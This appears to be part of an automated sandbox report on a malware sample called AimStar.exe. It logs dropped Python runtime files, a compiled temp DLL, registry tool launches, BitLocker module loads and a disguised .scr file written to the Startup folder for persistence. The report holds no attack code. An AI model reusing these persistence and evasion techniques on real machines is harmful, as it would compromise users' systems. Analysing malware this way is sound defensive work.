Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Source: C:\Users\user\Desktop\AimStar.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72842\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72842\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72842\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72842\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72842\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72842\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72842\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72842\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72842\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72842\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72842\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72842\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72842\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72842\libssl-3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.dll	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72842\python313.dll	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72842\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72842\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Jump to dropped file

Source: C:\Users\user\Desktop\AimStar.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr

Jump to behavior

Source: C:\Users\user\Desktop\AimStar.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\AimStar.exe

Code function: 0_2_00007FF710F476B0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

0_2_00007FF710F476B0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
